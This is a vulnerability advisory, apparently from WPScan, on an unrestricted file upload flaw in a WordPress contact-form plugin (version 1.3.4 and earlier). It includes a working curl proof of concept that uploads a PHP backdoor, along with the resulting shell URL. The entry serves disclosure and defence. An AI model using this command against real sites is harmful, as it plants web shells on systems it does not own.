N-Media Website Contact Form with File Upload <= 1.3.4 - Arbitrary File Upload

Description

The "upload_file()" ajax function is affected from unrestricted file upload vulnerability.

Proof of Concept

curl -k -X POST -F "action=upload" -F "Filedata=@./backdoor.php" -F "action=nm_webcontact_upload_file" http://www.example.com/wp-admin/admin-ajax.php

Response: {"status":"uploaded","filename":"1427927588-backdoor.php"}

http://www.example.com/wp-content/uploads/contact_files/1427927588-backdoor.php

Affects Plugin

website-contact-form-with-file-upload

fixed in version 1.4

References

EXPLOITDB	36738
METASPLOIT	exploit/unix/webapp/wp_nmediawebsite_file_upload
PACKETSTORM	131413
PACKETSTORM	131514
URL	http://www.homelab.it/index.php/2015/04/12/wordpress-n-media-website-contact-form-shell-upload/

Classification

Type	UPLOAD
CWE	CWE-434

Miscellaneous

Submitter	Claudio Viviani
Submitter Website	http://www.homelab.it
Submitter Twitter	homelabit
Views	1211
Verified	Yes
WPVDB ID	7896

Timeline

Publicly Published	2015-04-12 (over 3 years ago)
Added	2015-04-13 (over 3 years ago)
Last Updated	2015-05-15 (over 3 years ago)

Copyright & License

Copyright	All data and resources contained within this page and this web site is Copyright © The WPScan Team.
License	Some of this data may be used for non-commercial purposes, however, any potential commercial usage of this data will require a license. If you would like to inquire about a commercial license please contact us.